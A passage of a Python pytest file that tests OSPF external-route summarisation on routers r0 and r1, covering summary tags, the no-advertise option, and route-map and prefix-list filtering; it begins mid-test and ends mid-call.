"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify that summary lsa is withdrawn from R1 and deleted from R0.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary Route still present in RIB".format(
tc_name
)
step("show ip ospf summary should not have any summary address.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1234,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary still present in DB".format(tc_name)
step("Configure Min tag value")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8", "tag": 1}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "1"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries with tag.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Configure Max Tag Value")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "4294967295"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Verify that boundary values tags are used for summary route"
" using show ip ospf route command."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 4294967295,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("configure new static route with different tag.")
input_dict_static_rtes_11 = {
"r0": {
"static_routes": [
{"network": NETWORK_11["ipv4"], "next_hop": "blackhole", "tag": "88888"}
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes_11)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("New tag has not been used by summary address.")
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "88888"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, tag="88888", expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen,
"ipv4",
dut,
input_dict_summary,
protocol=protocol,
tag="88888",
expected=False,
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step(
"Verify that boundary values tags are used for summary route"
" using show ip ospf route command."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 88888,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Delete the configured summary address")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that 6 routes are advertised to neighbour with 5 routes"
" without any tag, 1 route with tag."
)
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that summary address is flushed from neighbor.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Configure summary first & then configure matching static route.")
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole", "delete": True},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole", "delete": True},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
write_test_footer(tc_name)
def test_ospf_type5_summary_tc46_p0(request):
    """OSPF summarisation with advertise and no advertise option.

    Verifies that an external-route summary configured with the
    "no advertise" option suppresses the summary LSA towards the
    neighbour (R1) while keeping the summary entry in R0's OSPF DB,
    and that deleting / reconfiguring the summary and flipping the
    option back to advertise re-originates the summary route and
    withdraws the component routes from the peer.

    :param request: pytest fixture carrying the test node name.
    """
    tc_name = request.node.name
    write_test_header(tc_name)
    tgen = get_topogen()
    # Don't run this test if we have any failure.
    if tgen.routers_have_failure():
        pytest.skip(tgen.errors)
    global topo

    step("Bring up the base config as per the topology")
    step("Configure OSPF on all the routers of the topology.")
    reset_config_on_routers(tgen)

    protocol = "ospf"
    step(
        "Configure 5 static routes from the same network on R0 "
        "5 static routes from different networks and redistribute in R0"
    )
    input_dict_static_rtes = {
        "r0": {
            "static_routes": [
                {"network": NETWORK["ipv4"], "next_hop": "blackhole"},
                {"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
            ]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    dut = "r0"
    red_static(dut)

    step("Verify that routes are learnt on R1.")
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step(
        "Configure External Route summary in R0 to summarise 5"
        " routes to one route with no advertise option."
    )
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {
                        "prefix": SUMMARY["ipv4"][0].split("/")[0],
                        "mask": "8",
                        "advertise": False,
                    }
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured summary"
        " address on R0 and summary route is not advertised to neighbor as"
        " no advertise is configured."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )
    result = verify_rib(
        tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    step("Verify that show ip ospf summary should show the configured summaries.")
    # With "no advertise", the summary entry has no metric/tag attributes,
    # only the matched external route count.
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Delete the configured summary")
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {
                        "prefix": SUMMARY["ipv4"][0].split("/")[0],
                        "mask": "8",
                        "delete": True,
                    }
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step("Summary has 5 sec delay timer, sleep 5 secs...")
    sleep(5)

    step("Verify that summary lsa is withdrawn from R1 and deleted from R0.")
    dut = "r1"
    # Check the summary prefix is absent from R1's OSPF RIB. Use the
    # router-keyed input_dict_summary here (the per-prefix summary-DB dict
    # is not the shape verify_ospf_rib expects).
    result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )
    result = verify_rib(
        tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Summary Route still present in RIB".format(
        tc_name
    )

    step("show ip ospf summary should not have any summary address.")
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 1234,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Summary still present in DB".format(tc_name)

    step("Reconfigure summary with no advertise.")
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {
                        "prefix": SUMMARY["ipv4"][0].split("/")[0],
                        "mask": "8",
                        "advertise": False,
                    }
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured summary"
        " address on R0 and summary route is not advertised to neighbor as"
        " no advertise is configured."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )
    result = verify_rib(
        tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    step("Verify that show ip ospf summary should show the configured summaries.")
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step(
        "Change summary address from no advertise to advertise "
        "(summary-address 10.0.0.0 255.255.0.0)"
    )
    # Re-apply the no-advertise form first, then overwrite it with the
    # plain (advertising) form of the same summary address.
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {
                        "prefix": SUMMARY["ipv4"][0].split("/")[0],
                        "mask": "8",
                        "advertise": False,
                    }
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured summary "
        "address on R0 after 5 secs of delay timer expiry and only one "
        "route is sent to R1."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("Verify that show ip ospf summary should show the summaries.")
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Verify that originally advertised routes are withdrawn from their peer.")
    input_dict = {
        "r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
    }
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )
    result = verify_rib(
        tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes is present in RIB".format(tc_name)

    write_test_footer(tc_name)
def test_ospf_type5_summary_tc47_p0(request):
    """OSPF summarisation with route map filtering.

    Exercises the interaction between an external-route summary on R0
    and the redistribution route-map: permit/deny flips on the matched
    prefix-list, route-map deletion, and configuration ordering
    (static routes, route map, summary address, prefix list), verifying
    summary origination and withdrawal towards R1 at each stage.

    :param request: pytest fixture carrying the test node name.
    """
    tc_name = request.node.name
    write_test_header(tc_name)
    tgen = get_topogen()
    # Don't run this test if we have any failure.
    if tgen.routers_have_failure():
        pytest.skip(tgen.errors)
    global topo

    step("Bring up the base config as per the topology")
    reset_config_on_routers(tgen)

    protocol = "ospf"
    step(
        "Configure 5 static routes from the same network on R0 "
        "5 static routes from different networks and redistribute in R0"
    )
    input_dict_static_rtes = {
        "r0": {
            "static_routes": [
                {"network": NETWORK["ipv4"], "next_hop": "blackhole"},
                {"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
            ]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    dut = "r0"
    red_static(dut)

    step("Verify that routes are learnt on R1.")
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step(
        "Configure External Route summary in R0 to summarise 5" " routes to one route."
    )
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured summary "
        "address on R0 after 5 secs of delay timer expiry and only one "
        "route is sent to R1."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("Verify that show ip ospf summary should show the summaries.")
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Verify that originally advertised routes are withdrawn from their peer.")
    input_dict = {
        "r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
    }
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )
    result = verify_rib(
        tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    step(
        "configure route map and add rule to permit configured static "
        "routes, redistribute static & connected routes with the route map."
    )
    # Create ip prefix list
    pfx_list = {
        "r0": {
            "prefix_lists": {
                "ipv4": {
                    "pf_list_1_ipv4": [
                        {"seqid": 10, "network": "any", "action": "permit"}
                    ]
                }
            }
        }
    }
    result = create_prefix_lists(tgen, pfx_list)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "permit",
                        "match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
                        "seq_id": 10,
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    ospf_red_r1 = {
        "r0": {
            "ospf": {
                "redistribute": [{"redist_type": "static", "route_map": "rmap_ipv4"}]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_red_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured "
        "summary address on R0 and only one route is sent to R1. Verify that "
        "show ip ospf summary should show the configure summaries."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step("Change the rule from permit to deny in configured route map.")
    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "deny",
                        "match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
                        "seq_id": 10,
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step("summary route has 5 secs delay, sleep 5 secs")
    sleep(5)

    step("Verify that advertised summary route is flushed from neighbor.")
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )
    result = verify_rib(
        tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    step("Delete the configured route map.")
    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "permit",
                        "match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
                        "delete": True,
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    # Redistribute static without any route map after the deletion.
    ospf_red_r1 = {"r0": {"ospf": {"redistribute": [{"redist_type": "static"}]}}}
    result = create_router_ospf(tgen, topo, ospf_red_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured "
        "summary address on R0 and only one route is sent to R1. Verify that "
        "show ip ospf summary should show the configure summaries."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Reconfigure the route map with denying configure summary address.")
    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "permit",
                        "match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
                        "seq_id": 10,
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    # Create ip prefix list denying the summary address itself.
    pfx_list = {
        "r0": {
            "prefix_lists": {
                "ipv4": {
                    "pf_list_1_ipv4": [
                        {"seqid": 10, "network": SUMMARY["ipv4"][0], "action": "deny"}
                    ]
                }
            }
        }
    }
    result = create_prefix_lists(tgen, pfx_list)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step("Verify that advertised summary route is not flushed from neighbor.")
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("Redistribute static/connected routes without route map.")
    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "permit",
                        "match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
                        "seq_id": 10,
                        "delete": True,
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured "
        "summary address on R0 and only one route is sent to R1. Verify that "
        "show ip ospf summary should show the configure summaries."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step(
        "Configure rule to deny all the routes in route map and configure"
        " redistribute command in ospf using route map."
    )
    # Create ip prefix list
    pfx_list = {
        "r0": {
            "prefix_lists": {
                "ipv4": {
                    "pf_list_1_ipv4": [
                        {"seqid": 10, "network": "any", "action": "deny"}
                    ]
                }
            }
        }
    }
    result = create_prefix_lists(tgen, pfx_list)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "permit",
                        "match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
                        "seq_id": 10,
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    ospf_red_r1 = {
        "r0": {
            "ospf": {
                "redistribute": [{"redist_type": "static", "route_map": "rmap_ipv4"}]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_red_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step("Verify that no summary route is originated.")
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )
    result = verify_rib(
        tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    # Remove the deny-all route map before the ordering scenario below.
    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "permit",
                        "match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
                        "seq_id": 10,
                        "delete": True,
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Configure cli in this order - 2 static routes, a route map to "
        "permit those routes, summary address in ospf to match the "
        "configured static route network, redistribute the static "
        "routes with route map"
    )
    input_dict_static_rtes = {
        "r0": {
            "static_routes": [{"network": NETWORK2["ipv4"], "next_hop": "blackhole"}]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "permit",
                        "match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][1].split("/")[0], "mask": "8"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    # Create ip prefix list
    pfx_list = {
        "r0": {
            "prefix_lists": {
                "ipv4": {
                    "pf_list_1_ipv4": [
                        {"seqid": 10, "network": "any", "action": "permit"}
                    ]
                }
            }
        }
    }
    result = create_prefix_lists(tgen, pfx_list)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured summary "
        "address on R0 after 5 secs of delay timer expiry and only one "
        "route is sent to R1."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": "12.0.0.0/8"}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("Verify that show ip ospf summary should show the summaries.")
    input_dict = {
        "12.0.0.0/8": {
            "Summary address": "12.0.0.0/8",
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Change route map rule for 1 of the routes to deny.")
    # Create ip prefix list
    pfx_list = {
        "r0": {
            "prefix_lists": {
                "ipv4": {
                    "pf_list_1_ipv4": [
                        {"seqid": 10, "network": NETWORK2["ipv4"][0], "action": "deny"},
                        {"seqid": 20, "network": "any", "action": "permit"},
                    ]
                }
            }
        }
    }
    result = create_prefix_lists(tgen, pfx_list)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
